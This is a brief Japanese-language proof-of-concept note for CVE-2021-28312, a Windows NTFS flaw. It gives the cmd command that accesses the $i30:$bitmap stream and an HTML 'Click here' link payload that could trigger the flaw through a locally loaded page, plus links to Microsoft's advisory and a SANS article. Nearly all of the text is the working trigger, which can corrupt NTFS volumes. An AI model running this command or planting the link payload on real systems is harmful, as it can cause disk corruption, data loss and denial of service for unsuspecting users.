
CVE-2021-28312のPOCと説明
リンク: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28312
cmdから: 次のコマンドを入力してください cd c:\:$i30:$bitmap
リモートエクスプロイトの可能性: ローカルで読み込まれたページに次のリンクを追加することで可能
<a href="file:\\c:\:$i30:$bitmap">Click here</a>
$i30属性の詳細: https://www.sans.org/blog/ntfs-i30-index-attributes-evidence-of-deleted-and-overwritten-files/